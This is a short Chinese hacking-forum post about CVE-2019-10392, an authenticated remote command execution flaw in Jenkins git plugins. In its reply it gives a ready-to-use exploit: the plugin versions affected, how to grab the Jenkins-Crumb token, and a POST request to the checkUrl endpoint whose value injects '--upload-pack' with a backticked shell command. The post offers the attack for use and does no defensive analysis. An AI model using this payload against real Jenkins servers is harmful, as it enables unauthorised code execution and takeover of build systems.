CVE-2019-10392 Jenkins 2k19认证远程RCE--星际黑客

CVE-2019-10392 Jenkins 2k19认证远程RCE

adminsb 4月前 185

https://www.t00ls.net/redirect-52827.html

最新回复 (1)

adminsb 4月前

0 引用 2楼

只需要安装了git-client 2.8.2下和git 3.12.0下即可
访问192.168.253.139:8080/job/test2/configure 获得Jenkins-Crumb
再访问192.168.253.139:8080/job/test2/descriptorByName/hudson.plugins.git.UserRemoteConfig/checkUrl post:value=--upload-pack%3D%22%60id%60%22&credentialsId=
即可执行命令。
test2为任务名

adminsb

主题数
1622

帖子数
98

注册排名
1

作者最近主题：